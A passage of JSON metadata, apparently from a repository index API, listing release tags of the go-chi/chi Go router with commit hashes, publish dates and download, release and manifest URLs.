a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hos